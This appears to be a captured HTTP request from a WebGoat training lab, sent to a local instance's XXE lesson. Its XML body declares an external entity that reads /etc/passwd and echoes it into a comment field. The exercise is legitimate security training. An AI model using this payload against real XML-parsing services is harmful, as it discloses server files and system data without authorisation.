POST /WebGoat/xxe/simple HTTP/1.1
Host: localhost:8080
Content-Length: 135
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept-Language: es-ES
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Content-Type: application/xml
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: "Linux"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/WebGoat/start.mvc?username=datadiego
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=Y8SXk6JT2FPFrVHlqt9Sua0l0YMhLuKBQbtMBtiN
Connection: keep-alive

<?xml version="1.0"?>

<!DOCTYPE text [
  <!ENTITY js SYSTEM "file:///etc/passwd">
]>
<comment>  <text>
&js;
</text></comment>

